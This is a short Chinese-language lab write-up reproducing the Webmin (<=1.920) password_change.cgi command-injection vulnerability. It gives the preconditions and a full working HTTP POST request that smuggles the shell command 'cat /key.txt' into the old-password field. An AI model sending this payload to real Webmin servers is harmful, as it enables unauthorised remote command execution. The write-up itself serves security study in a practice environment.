0x00 复现环境

使用复现环境：https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe
复现版本：Webmin1.910

0x01 利用条件

需要开启密码重置功能，如下图

查看webmin的配置文件/etc/webmin/miniserv.conf，可以发现passwd_mode的值已经从0变为了2

0x02 影响版本

Webmin<=1.920

0x03 漏洞复现

随便发起一个请求，burp拦截，修改为如下数据包

POST /password_change.cgi HTTP/1.1
Host: 219.153.49.228:41489
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://219.153.49.228:41489/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Connection: close

user=yibudengtian&old=cat /key.txt&new1=123456&new2=123456

0x04 踩坑记录

坑1：

参考链接

https://xz.aliyun.com/t/6040
https://www.cnblogs.com/paperpen/p/11442532.html